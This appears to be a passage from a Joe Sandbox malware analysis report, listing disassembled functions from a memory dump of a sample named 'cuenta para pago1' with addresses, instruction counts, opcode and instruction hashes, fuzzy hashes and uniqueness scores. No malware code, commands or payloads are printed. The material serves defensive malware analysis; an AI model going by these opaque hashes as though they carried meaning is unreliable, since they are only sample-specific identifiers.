                                                                                      • Opcode Fuzzy Hash: b1124ab5cdab2f8b4654146be9d22e00efa7243d3ce002ecfd66793f1b1755f8
                                                                                      • Instruction Fuzzy Hash: B651E476304799CFE321DB28C844B5AB3E9EB48B94F4506A9F851CB7A5DB34EC40CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348F0118 Relevance: .1, Instructions: 138COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4a532cacd93a70168678d7ade94b3b27b83aba959dcd35477089372248aac055
                                                                                      • Instruction ID: 45a20d28c6e948f1a161703602630024e94d1eb67a771eb7a3410641cb4679a0
                                                                                      • Opcode Fuzzy Hash: 4a532cacd93a70168678d7ade94b3b27b83aba959dcd35477089372248aac055
                                                                                      • Instruction Fuzzy Hash: E841D07AA01319DFDB01CFD8E840AEDB7B4BF4A704F21425AE824E7250DB769C41CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 34902670 Relevance: .1, Instructions: 137COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                                                      • Instruction ID: 9bcca0bca8af9861dd0a8fd99b2d2e1374f0018c3fe5cad1f7bc78d086b443a2
                                                                                      • Opcode Fuzzy Hash: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                                                      • Instruction Fuzzy Hash: 26513A79A01619CFDB05CF99C480AAEF7B5FF89714F2481A9D815AB350D731AE81CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C6074 Relevance: .1, Instructions: 133COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9268822fda5fe5567fa605a0cc04552b29844e46647bdf4e1c2606b1450cf2e5
                                                                                      • Instruction ID: 14ad82527efcd471b1f3f19eceb81bf46923aad1f16982ac0610d70b732f905f
                                                                                      • Opcode Fuzzy Hash: 9268822fda5fe5567fa605a0cc04552b29844e46647bdf4e1c2606b1450cf2e5
                                                                                      • Instruction Fuzzy Hash: A8519074A40216DFEB25CF28CC00BA9B7B5AF01314F1183AAD569B72E1EB749D81CF41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348BB0D6 Relevance: .1, Instructions: 131COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ca1cd08f5425016f0f18b04eb06c706a5ae6d7cbb1de79115e456b314f8f69ba
                                                                                      • Instruction ID: f4b80d096c7fdefb3159c35092f64fbb0e560b2d5b9423942ca0b46ae6545506
                                                                                      • Opcode Fuzzy Hash: ca1cd08f5425016f0f18b04eb06c706a5ae6d7cbb1de79115e456b314f8f69ba
                                                                                      • Instruction Fuzzy Hash: 1241ABB0641309EFFB119F6DC840B1ABBE8EF00794F00866AE5A1DB760EBB4D900CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 349881EE Relevance: .1, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                      • Instruction ID: 21e449e57794a5f5f6294d60442a94da93d0d146ddb4df0525299f38555607c3
                                                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                      • Instruction Fuzzy Hash: B0417175B00215AFEB14CB9DC990AAFBBBAAF88790F5440A9A815A7341DB70DE05C760
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C07A7 Relevance: .1, Instructions: 128COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2498750009d59ec55734c32f19f3e7116f4c885830d393e536a19af3012a4eae
                                                                                      • Instruction ID: d7c309ae34c8a7a4881d9c3d9e2418864937fd00c8eb472bf067f62608d9459a
                                                                                      • Opcode Fuzzy Hash: 2498750009d59ec55734c32f19f3e7116f4c885830d393e536a19af3012a4eae
                                                                                      • Instruction Fuzzy Hash: 2A41A0B1600705DFE728CFA8C880A12F7F9FF4A394B508B6ED45687A50EB71E855DB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348EA390 Relevance: .1, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7c7a19a726b1dad23f367b5306dee05e2bcea46726401bbf38e99cf4235519e4
                                                                                      • Instruction ID: b9f3328ba7f8f522b792286d1b9333204676782562cc23a77c113bdec0599312
                                                                                      • Opcode Fuzzy Hash: 7c7a19a726b1dad23f367b5306dee05e2bcea46726401bbf38e99cf4235519e4
                                                                                      • Instruction Fuzzy Hash: 1A41C075A88319CFEB01CF68C8907ED7BB4FF0A754F104299D410BB690DB34A981DBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348ED600 Relevance: .1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 50ae9f03e2e2ec0b82efb14754b60a86e0bd9027df528ecdb5a493f97565ff85
                                                                                      • Instruction ID: ce7cbffc21bb0fcfc82e60f399b06fdbdbfb822e877020743901a909b53b0d8c
                                                                                      • Opcode Fuzzy Hash: 50ae9f03e2e2ec0b82efb14754b60a86e0bd9027df528ecdb5a493f97565ff85
                                                                                      • Instruction Fuzzy Hash: 9641E471604215DFF320DF29CD80E6ABBE8EF85364F00462DFA2597295CB30E845DB96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348F0630 Relevance: .1, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                                                      • Instruction ID: deb4d224c5c61efacdb597788f2373790f0084d2484df820ac4b27b95b1141cd
                                                                                      • Opcode Fuzzy Hash: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                                                      • Instruction Fuzzy Hash: 2F4159B5A00709EFDB24CF98D980A9AB7F8FF49700B104A6DE556EB250E731EA44CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3498D7A7 Relevance: .1, Instructions: 120COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e538e72e7554644d195e9309af4efcf27f2074c78fc4c9996ba7fb13c770dd76
                                                                                      • Instruction ID: ca964ba2d959677bd590744acf408fdc804c180ee419d5984edc8324869b20b7
                                                                                      • Opcode Fuzzy Hash: e538e72e7554644d195e9309af4efcf27f2074c78fc4c9996ba7fb13c770dd76
                                                                                      • Instruction Fuzzy Hash: E541BDB27443058FE715DF2DC880B2ABBEAEBC4750F04462DE896C7391EA78D845CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348F1796 Relevance: .1, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2b222da7ee829c990e7622d5bc5317985b1ad3cd44227edab450d48fb388e665
                                                                                      • Instruction ID: e98a66301079412de6b99e1d57cf4e210f318133f48619a8056d554261903156
                                                                                      • Opcode Fuzzy Hash: 2b222da7ee829c990e7622d5bc5317985b1ad3cd44227edab450d48fb388e665
                                                                                      • Instruction Fuzzy Hash: B54189B5A05309DFDB15CF58E880B99BBF1FB4A714F14826AE804AB358C735AD41CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 34940227 Relevance: .1, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 10b692ed3ac115dd72506ad66b98eb971e150e1bdc92fd5c13098f637b5b160e
                                                                                      • Instruction ID: 9e6687a46513593947f2f511dbb0acffd2f140a5f5a63c5cec13f0ffd56447ec
                                                                                      • Opcode Fuzzy Hash: 10b692ed3ac115dd72506ad66b98eb971e150e1bdc92fd5c13098f637b5b160e
                                                                                      • Instruction Fuzzy Hash: 68418D766056419FD314CF68D840A6AB7E9BF88740F014A2DF868DB690E730E914C7A6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348D01F1 Relevance: .1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
                                                                                      • Instruction ID: 3da4a6043959697700c1c812a81b0236132f028d4b8ebef2aa257d0f8e3a2585
                                                                                      • Opcode Fuzzy Hash: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
                                                                                      • Instruction Fuzzy Hash: D8312835A02348EFEB128FA8CC44B9ABBA9EF46350F044279E854D7352C7B4C844CB65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348E9194 Relevance: .1, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5cc5a4f992e70cb56c5b9bcc964c86f60efdd75eb41cf171b77908191688d29b
                                                                                      • Instruction ID: 068a5bf181a9c3048b88d50bac4d15f437f3d81d1690b7b1172858b3f8375352
                                                                                      • Opcode Fuzzy Hash: 5cc5a4f992e70cb56c5b9bcc964c86f60efdd75eb41cf171b77908191688d29b
                                                                                      • Instruction Fuzzy Hash: 21318575A0032CDFEB218B24CC40FAE77B9EF86710F110299A55CA7241DBB09D858F51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348E66E0 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                                                      • Instruction ID: e167ebe40a736b92103fc8e5ff1c02158b9815da2ddcb6641b6d2b6f45ddb266
                                                                                      • Opcode Fuzzy Hash: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                                                      • Instruction Fuzzy Hash: F141B0B6600B49DFD732CF18C940FAA77A9FF45B50F404A38E4558B6A4CB32E841DB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C4180 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e1576b2ee681af8079264058e53d0a0d98a0304e7529fec5ece7b0fa4ad801d8
                                                                                      • Instruction ID: fa37cfc81f0abde380005de5d96242f40b0fd07dd11afc59cc293dfc0bd9e0cc
                                                                                      • Opcode Fuzzy Hash: e1576b2ee681af8079264058e53d0a0d98a0304e7529fec5ece7b0fa4ad801d8
                                                                                      • Instruction Fuzzy Hash: 5B41BE72245B48DFE722CF24C481BC6B7E8EF48714F018529EA5A8B250CB74E844CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348E5004 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                                                      • Instruction ID: 1b7c6406013b64b42072d7faf9d89b5f5297b80e942923fd3940b767a7f64067
                                                                                      • Opcode Fuzzy Hash: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                                                      • Instruction Fuzzy Hash: 9E31067530A305DFE750EEA88410B76B7D8AB86794F40862EF8C48B285D675C9C1C7E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3493E79D Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 567e0c65b10cae9f70bd3aa1e4f8e6c3693320f8153d5fbd115f9a598903215a
                                                                                      • Instruction ID: d37c72997d77aa2946e599c43ea5c54aced64eb97670ee45f0bef8bff4c8853c
                                                                                      • Opcode Fuzzy Hash: 567e0c65b10cae9f70bd3aa1e4f8e6c3693320f8153d5fbd115f9a598903215a
                                                                                      • Instruction Fuzzy Hash: 9931C1B9B43680DFFB228769C944B1577DCEB43B84F5504B8AA049B6E2DB68E840C220
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C06CF Relevance: .1, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8f0983895da350b3bd6abb222196c31a54c7f0356ce57d79fb8602d2829160be
                                                                                      • Instruction ID: 31bdcaae3ca6308986a63f5b0b7c962cc5f9393d2acd5328ad18d7fd6174e6c8
                                                                                      • Opcode Fuzzy Hash: 8f0983895da350b3bd6abb222196c31a54c7f0356ce57d79fb8602d2829160be
                                                                                      • Instruction Fuzzy Hash: 4A31F436A457159FEB16DEA88880E5BF7A9EFC62E0F014629FC5597310EB31CC058FA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C8470 Relevance: .1, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a781d2b6bd42c531b1fb6ef5a4b145a5951f2befa97cdb9f321d735e9389c6eb
                                                                                      • Instruction ID: da9fcbd779e8e441bece021f7de7ccf0cb6ac2298ffa4ee49b8325ddf675bf9d
                                                                                      • Opcode Fuzzy Hash: a781d2b6bd42c531b1fb6ef5a4b145a5951f2befa97cdb9f321d735e9389c6eb
                                                                                      • Instruction Fuzzy Hash: A83169B5A057118FE350CF19C805B2AF7E9FB88710F414A6DE99897390DBB4EC44CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348BD64A Relevance: .1, Instructions: 93COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                                                      • Instruction ID: 0eaca97db08b4a6a20f711e11b3b9c3fb67f05e6bbde390b05fa5bdbde22328c
                                                                                      • Opcode Fuzzy Hash: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                                                      • Instruction Fuzzy Hash: A631F0BA601208FFEF11CE58C980B9A73E9EB85798F118629EC888B304D774DD40CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 349917BC Relevance: .1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                      • Instruction ID: c97e8ebd525a6644fa3f1e4e9b4d343f5d50e95d528f7fd6a20fe625c940574b
                                                                                      • Opcode Fuzzy Hash: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                      • Instruction Fuzzy Hash: 1D31BEB2E00219EFD704CF69C881AADB7F1FF98315F15816AE854DB341D734AA51DBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C91E5 Relevance: .1, Instructions: 89COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
                                                                                      • Instruction ID: 338d16e0a55a4f1d2b43a6739d1e6aca9b0461d49c95d86515b75f3e12170c29
                                                                                      • Opcode Fuzzy Hash: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
                                                                                      • Instruction Fuzzy Hash: EE3169B6608359CFD705CF18D84094ABBE9EF89750F0506AAF8649B391DB30DC15CBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

